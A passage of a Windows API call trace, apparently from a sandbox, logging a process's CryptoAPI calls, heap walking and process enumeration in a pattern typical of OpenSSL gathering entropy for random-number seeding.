lpProcName="CryptReleaseContext") returned 0x7611e124 [0190.102] CryptAcquireContextW (in: phProv=0x312f018, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312f018*=0x67c0e0) returned 1 [0190.103] CryptGenRandom (in: hProv=0x67c0e0, dwLen=0x40, pbBuffer=0x312f464 | out: pbBuffer=0x312f464) returned 1 [0190.104] GetCurrentThreadId () returned 0x66c [0190.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.104] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0190.104] CryptAcquireContextW (in: phProv=0x312f018, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0x312f018*=0x67c0e0) returned 0 [0190.105] FreeLibrary (hLibModule=0x76110000) returned 1 [0190.105] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0190.105] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0 [0190.105] GetDesktopWindow () returned 0x10010 [0190.106] GetProcessWindowStation () returned 0x5c [0190.106] GetUserObjectInformationW (in: hObj=0x5c, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0x312efa0 | out: pvInfo=0x0, lpnLengthNeeded=0x312efa0) returned 0 [0190.106] GetLastError () returned 0x7a [0190.128] GetUserObjectInformationW (in: hObj=0x5c, nIndex=2, pvInfo=0x312ef80, nLength=0x10, lpnLengthNeeded=0x312efa0 | out: pvInfo=0x312ef80, lpnLengthNeeded=0x312efa0) returned 1 [0190.128] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x76010000 [0190.128] GetProcAddress (hModule=0x76010000, lpProcName="GetForegroundWindow") returned 0x76032320 [0190.129] GetProcAddress (hModule=0x76010000, lpProcName="GetCursorInfo") returned 0x7608812f [0190.129] GetProcAddress (hModule=0x76010000, lpProcName="GetQueueStatus") returned 0x76033924 [0190.130] GetForegroundWindow () returned 0x10066 [0190.130] GetCurrentThreadId () returned 0x66c [0190.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.131] GetCursorInfo (in: pci=0x312f450 | out: pci=0x312f450) returned 1 [0190.132] GetQueueStatus (flags=0xbf) returned 0x0 [0190.132] GetCurrentThreadId () returned 0x66c [0190.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.133] FreeLibrary (hLibModule=0x76010000) returned 1 [0190.133] GetProcAddress (hModule=0x75cd0000, lpProcName="CreateToolhelp32Snapshot") returned 0x75d07327 [0190.133] GetProcAddress (hModule=0x75cd0000, lpProcName="CloseToolhelp32Snapshot") returned 0x0 [0190.134] GetProcAddress (hModule=0x75cd0000, lpProcName="Heap32First") returned 0x75d65d03 [0190.134] GetProcAddress (hModule=0x75cd0000, lpProcName="Heap32Next") returned 0x75d65eee [0190.134] GetProcAddress (hModule=0x75cd0000, lpProcName="Heap32ListFirst") returned 0x75d65bc1 [0190.134] GetProcAddress (hModule=0x75cd0000, lpProcName="Heap32ListNext") returned 0x75d65c6b [0190.135] GetProcAddress (hModule=0x75cd0000, lpProcName="Process32First") returned 0x75d08abb [0190.135] GetProcAddress (hModule=0x75cd0000, lpProcName="Process32Next") returned 0x75d08812 [0190.135] GetProcAddress (hModule=0x75cd0000, lpProcName="Thread32First") returned 0x75d66133 [0190.136] GetProcAddress (hModule=0x75cd0000, lpProcName="Thread32Next") returned 0x75d661df [0190.136] GetProcAddress (hModule=0x75cd0000, lpProcName="Module32First") returned 0x75d66279 [0190.136] GetProcAddress (hModule=0x75cd0000, lpProcName="Module32Next") returned 0x75d66362 [0190.136] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x578 [0190.151] GetTickCount () returned 0xf068 [0190.152] Heap32ListFirst (hSnapshot=0x578, lphl=0x312f454) returned 1 [0190.153] GetCurrentThreadId () returned 0x66c [0190.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.154] Heap32First (lphe=0x312efc0, th32ProcessID=0x7dc, th32HeapID=0x620000) returned 1 [0190.194] GetCurrentThreadId () returned 0x66c [0190.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.195] Heap32Next (lphe=0x312efc0) returned 1 [0190.227] GetTickCount () returned 0xf0b6 [0190.227] GetCurrentThreadId () returned 0x66c [0190.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.228] Heap32Next (lphe=0x312efc0) returned 1 [0190.261] GetTickCount () returned 0xf0d5 [0190.261] GetCurrentThreadId () returned 0x66c [0190.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.262] Heap32Next (lphe=0x312efc0) returned 1 [0190.294] GetTickCount () returned 0xf0f4 [0190.294] GetCurrentThreadId () returned 0x66c [0190.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.295] Heap32Next (lphe=0x312efc0) returned 1 [0190.328] GetTickCount () returned 0xf113 [0190.328] GetCurrentThreadId () returned 0x66c [0190.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.329] Heap32Next (lphe=0x312efc0) returned 1 [0190.372] GetTickCount () returned 0xf142 [0190.372] GetCurrentThreadId () returned 0x66c [0190.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.373] Heap32Next (lphe=0x312efc0) returned 1 [0190.439] GetTickCount () returned 0xf180 [0190.439] GetCurrentThreadId () returned 0x66c [0190.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.440] Heap32Next (lphe=0x312efc0) returned 1 [0190.473] GetTickCount () returned 0xf1af [0190.473] GetCurrentThreadId () returned 0x66c [0190.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.474] Heap32Next (lphe=0x312efc0) returned 1 [0190.506] GetTickCount () returned 0xf1ce [0190.506] GetCurrentThreadId () returned 0x66c [0190.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.507] Heap32Next (lphe=0x312efc0) returned 1 [0190.535] GetTickCount () returned 0xf1ee [0190.535] GetCurrentThreadId () returned 0x66c [0190.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.536] Heap32Next (lphe=0x312efc0) returned 1 [0190.566] GetTickCount () returned 0xf1fd [0190.566] GetCurrentThreadId () returned 0x66c [0190.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.567] Heap32Next (lphe=0x312efc0) returned 1 [0190.596] GetTickCount () returned 0xf21c [0190.596] GetCurrentThreadId () returned 0x66c [0190.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.597] Heap32Next (lphe=0x312efc0) returned 1 [0190.626] GetTickCount () returned 0xf23c [0190.626] GetCurrentThreadId () returned 0x66c [0190.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.626] Heap32Next (lphe=0x312efc0) returned 1 [0190.655] GetTickCount () returned 0xf25b [0190.655] GetCurrentThreadId () returned 0x66c [0190.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.656] Heap32Next (lphe=0x312efc0) returned 1 [0190.686] GetTickCount () returned 0xf27a [0190.686] GetCurrentThreadId () returned 0x66c [0190.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.687] Heap32Next (lphe=0x312efc0) returned 1 [0190.717] GetTickCount () returned 0xf299 [0190.717] GetCurrentThreadId () returned 0x66c [0190.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.718] Heap32Next (lphe=0x312efc0) returned 1 [0190.747] GetTickCount () returned 0xf2b8 [0190.747] GetCurrentThreadId () returned 0x66c [0190.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.747] Heap32Next (lphe=0x312efc0) returned 1 [0190.776] GetTickCount () returned 0xf2d8 [0190.776] GetCurrentThreadId () returned 0x66c [0190.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.777] Heap32Next (lphe=0x312efc0) returned 1 [0190.807] GetTickCount () returned 0xf2f7 [0190.807] GetCurrentThreadId () returned 0x66c [0190.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.808] Heap32Next (lphe=0x312efc0) returned 1 [0190.834] GetTickCount () returned 0xf316 [0190.834] GetCurrentThreadId () returned 0x66c [0190.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.835] Heap32Next (lphe=0x312efc0) returned 1 [0190.862] GetTickCount () returned 0xf326 [0190.862] GetCurrentThreadId () returned 0x66c [0190.862] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.863] Heap32Next (lphe=0x312efc0) returned 1 [0190.898] GetTickCount () returned 0xf354 [0190.898] GetCurrentThreadId () returned 0x66c [0190.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.898] Heap32Next (lphe=0x312efc0) returned 1 [0190.924] GetTickCount () returned 0xf364 [0190.924] GetCurrentThreadId () returned 0x66c [0190.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.925] Heap32Next (lphe=0x312efc0) returned 1 [0190.954] GetTickCount () returned 0xf383 [0190.954] GetCurrentThreadId () returned 0x66c [0190.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.954] Heap32Next (lphe=0x312efc0) returned 1 [0190.986] GetTickCount () returned 0xf3a2 [0190.986] GetCurrentThreadId () returned 0x66c [0190.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0190.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0190.986] Heap32Next (lphe=0x312efc0) returned 1 [0191.017] GetTickCount () returned 0xf3c2 [0191.017] GetCurrentThreadId () returned 0x66c [0191.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.018] Heap32Next (lphe=0x312efc0) returned 1 [0191.044] GetTickCount () returned 0xf3e1 [0191.044] GetCurrentThreadId () returned 0x66c [0191.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.045] Heap32Next (lphe=0x312efc0) returned 1 [0191.079] GetTickCount () returned 0xf400 [0191.079] GetCurrentThreadId () returned 0x66c [0191.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.079] Heap32Next (lphe=0x312efc0) returned 1 [0191.105] GetTickCount () returned 0xf41f [0191.105] GetCurrentThreadId () returned 0x66c [0191.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.106] Heap32Next (lphe=0x312efc0) returned 1 [0191.134] GetTickCount () returned 0xf43e [0191.134] GetCurrentThreadId () returned 0x66c [0191.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.135] Heap32Next (lphe=0x312efc0) returned 1 [0191.162] GetTickCount () returned 0xf45e [0191.162] Heap32ListNext (hSnapshot=0x578, lphl=0x312f454) returned 1 [0191.163] GetTickCount () returned 0xf45e [0191.163] GetTickCount () returned 0xf45e [0191.163] Process32First (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.164] GetCurrentThreadId () returned 0x66c [0191.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.165] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x58, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0191.167] GetTickCount () returned 0xf45e [0191.167] GetCurrentThreadId () returned 0x66c [0191.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.167] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0191.169] GetTickCount () returned 0xf45e [0191.169] GetCurrentThreadId () returned 0x66c [0191.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.169] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.171] GetTickCount () returned 0xf45e [0191.171] GetCurrentThreadId () returned 0x66c [0191.171] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.171] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0191.173] GetTickCount () returned 0xf45e [0191.173] GetCurrentThreadId () returned 0x66c [0191.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.173] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x15c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.175] GetTickCount () returned 0xf46d [0191.175] GetCurrentThreadId () returned 0x66c [0191.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.175] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x15c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0191.177] GetTickCount () returned 0xf46d [0191.177] GetCurrentThreadId () returned 0x66c [0191.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.178] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x164, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0191.179] GetTickCount () returned 0xf46d [0191.179] GetCurrentThreadId () returned 0x66c [0191.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.180] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x164, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0191.182] GetTickCount () returned 0xf46d [0191.182] GetCurrentThreadId () returned 0x66c [0191.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.182] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x164, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0191.184] GetTickCount () returned 0xf46d [0191.184] GetCurrentThreadId () returned 0x66c [0191.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.185] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.186] GetTickCount () returned 0xf46d [0191.186] GetCurrentThreadId () returned 0x66c [0191.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.187] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.188] GetTickCount () returned 0xf46d [0191.188] GetCurrentThreadId () returned 0x66c [0191.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.189] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.191] GetTickCount () returned 0xf47d [0191.191] GetCurrentThreadId () returned 0x66c [0191.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.191] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.192] GetTickCount () returned 0xf47d [0191.193] GetCurrentThreadId () returned 0x66c [0191.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.193] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.195] GetTickCount () returned 0xf47d [0191.195] GetCurrentThreadId () returned 0x66c [0191.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.195] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0191.197] GetTickCount () returned 0xf47d [0191.197] GetCurrentThreadId () returned 0x66c [0191.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.197] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.199] GetTickCount () returned 0xf47d [0191.199] GetCurrentThreadId () returned 0x66c [0191.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.199] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.201] GetTickCount () returned 0xf47d [0191.201] GetCurrentThreadId () returned 0x66c [0191.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.201] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0191.203] GetTickCount () returned 0xf47d [0191.203] GetCurrentThreadId () returned 0x66c [0191.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.203] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.205] GetTickCount () returned 0xf47d [0191.205] GetCurrentThreadId () returned 0x66c [0191.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.205] Process32Next (in: hSnapshot=0x578, lppe=0x312f258 | out: lppe=0x312f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0191.207] GetTickCount () returned 0xf48c [0191.207] GetCurrentThreadId () returned 0x66c [0191.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 